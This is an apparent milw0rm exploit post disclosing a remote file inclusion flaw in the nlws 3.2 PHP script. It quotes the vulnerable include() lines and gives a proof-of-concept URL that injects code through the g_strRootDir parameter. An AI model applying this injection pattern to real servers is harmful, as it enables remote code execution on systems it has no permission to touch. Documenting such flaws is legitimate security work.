20 lines
No EOL
1.1 KiB
Text
20 lines
No EOL
1.1 KiB
Text
------------------------------------------------------------------------------------------------------------------------
|
|
Script:nlws
|
|
Affected Version:3.2
|
|
Downlaoad:http://neonlabs.structum.com.mx/pkgs/nlws_3-2.zip
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Author:Dr Max Virus
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Bug in (lib/nl/nl.php)
|
|
Vul Code;
|
|
include($g_strRootDir.$g_strLibDir."nl/nlsite.php");
|
|
include($g_strRootDir.$g_strLibDir."nl/nltable.php");
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
POC:
|
|
http://[target]/[path]/lib/nl/nl.php?g_strRootDir=[Bad Code]
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
|
|
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2007-01-20] |